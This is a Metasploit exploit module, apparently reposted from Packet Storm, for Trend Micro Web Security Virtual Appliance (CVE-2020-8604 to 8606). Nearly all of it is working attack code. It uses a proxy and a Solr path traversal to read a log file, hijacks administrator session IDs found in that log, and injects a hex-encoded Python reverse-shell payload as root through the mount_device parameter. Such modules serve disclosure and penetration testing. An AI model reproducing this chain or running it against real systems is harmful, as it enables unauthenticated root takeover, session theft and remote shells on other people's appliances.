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Trend Micro Web Security (Virtual Appliance) Remote Code Execution

2020-06-2200:00:00
Mehmet Ince
packetstormsecurity.com
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`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',  
'Description' => %q{  
This module exploits multiple vulnerabilities together in order to achive a remote code execution.  
Unauthenticated users can execute a terminal command under the context of the root user.  
  
The specific flaw exists within the LogSettingHandler class of administrator interface software.  
When parsing the mount_device parameter, the process does not properly validate a user-supplied string  
before using it to execute a system call. An attacker can leverage this vulnerability to execute code in  
the context of root. But authentication is required to exploit this vulnerability.  
  
Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users  
can exploit this vulnerability in order to communicate with internal services in the product.  
  
Last but not least a flaw exists within the Apache Solr application, which is installed within the product.  
When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.  
An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.  
  
Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.  
  
Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Mehmet Ince <[email protected]>' # discovery & msf module  
],  
'References' =>  
[  
['CVE', '2020-8604'],  
['CVE', '2020-8605'],  
['CVE', '2020-8606'],  
['ZDI', '20-676'],  
['ZDI', '20-677'],  
['ZDI', '20-678']  
],  
'Privileged' => true,  
'DefaultOptions' =>  
{  
'SSL' => true,  
'payload' => 'python/meterpreter/reverse_tcp',  
'WfsDelay' => 30  
},  
'Payload' =>  
{  
'Compat' =>  
{  
'ConnectionType' => '-bind'  
}  
},  
'Platform' => ['python'],  
'Arch' => ARCH_PYTHON,  
'Targets' => [ ['Automatic', {}] ],  
'DisclosureDate' => '2020-06-10',  
'DefaultTarget' => 0,  
'Notes' =>  
{  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(8443),  
OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])  
]  
)  
end  
  
def hijack_cookie  
# Updating SSL and RPORT in order to communicate with HTTP proxy service.  
if datastore['SSL']  
ssl_restore = true  
datastore['SSL'] = false  
end  
port_restore = datastore['RPORT']  
datastore['RPORT'] = datastore['PROXY_PORT']  
  
@jsessionid = ''  
  
# We are exploiting proxy service vulnerability in order to fetch content of catalina.out file  
print_status('Trying to extract session ID by exploiting reverse proxy service')  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",  
'vars_get' => {  
'command' => 'filecontent',  
'wt' => 'filestream',  
'generation' => 1,  
'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'  
}  
})  
  
# Restore variables and validate extracted sessionid  
datastore['SSL'] = true if ssl_restore  
datastore['RPORT'] = port_restore  
  
# Routine check on res object  
unless res  
fail_with(Failure::Unreachable, 'Target is unreachable.')  
end  
  
# If the res code is not 200 that means proxy service is not vulnerable.  
unless res.code == 200  
@jsessionid = -1  
return  
end  
  
# Now we are going to extract all JESSIONID from log file and store them in array.  
cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten  
  
if cookies.empty?  
@jsessionid = 0  
print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')  
return  
end  
  
print_good("Extracted number of JSESSIONID: #{cookies.length}")  
  
# We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.  
datastore['SSL'] = true if ssl_restore  
datastore['RPORT'] = port_restore  
  
# Latest cookie in the log file is the one most probably active. So that we use reverse on array.  
cookies.reverse.each_with_index do |cookie, index|  
print_status("Testing JSESSIONID ##{index} : #{cookie}")  
  
# This endpoints is basically check session :)  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),  
'cookie' => "JSESSIONID=#{cookie}"  
})  
  
# Routine res check  
unless res  
fail_with(Failure::UnexpectedReply, 'Target is unreachable.')  
end  
  
# If the cookie is active !  
if res.code == 200 && res.body.include?('session_flag')  
print_good("Awesome!!! JESSIONID ##{index} is active.")  
@jsessionid = cookie  
break  
end  
  
print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")  
end  
  
if @jsessionid.empty?  
print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')  
end  
end  
  
def check  
#  
# @jsessionid can be one of the following value  
#  
# -1 = Proxy service is not vulnerable, which means we'r not gonna  
# be able to read catalina.out  
#  
# 0 = Proxy service is vulnerable, but catalina.out does not contain any  
# jessionid string yet !  
#  
# empty = Proxy service is vulnerable, but jessionid within log file but  
# none of them are valid:(  
#  
# string = Proxy service is vulnerable and sessionid is valid !  
#  
hijack_cookie  
  
if @jsessionid == -1  
CheckCode::Safe  
else  
CheckCode::Vulnerable  
end  
end  
  
def exploit  
  
unless check == CheckCode::Vulnerable  
fail_with Failure::NotVulnerable, 'Target is not vulnerable'  
end  
  
#  
# 0 => Proxy service is vulnerable, but catalina.out does not contain any  
# jessionid string yet !  
#  
# empty => Proxy service is vulnerable, but jessionid within log file but  
# none of them are valid:(  
#  
if @jsessionid.empty? || @jessionid == 0  
fail_with Failure::NoAccess, ''  
end  
  
print_status('Exploiting command injection vulnerability')  
  
# Yet another app specific bypass is going on here.  
# It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)  
# For that reason, I am planting our payload dropper within the perl command.  
  
cmd = "python -c \"#{payload.encoded}\""  
final_payload = cmd.to_s.unpack1('H*')  
p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"  
  
vars_post = {  
mount_device: "mount $(#{p}) /var/offload",  
cmd: 'mount'  
}  
  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),  
'cookie' => "JSESSIONID=#{@jsessionid}",  
'ctype' => 'application/json',  
'data' => vars_post.to_json  
})  
end  
end  
`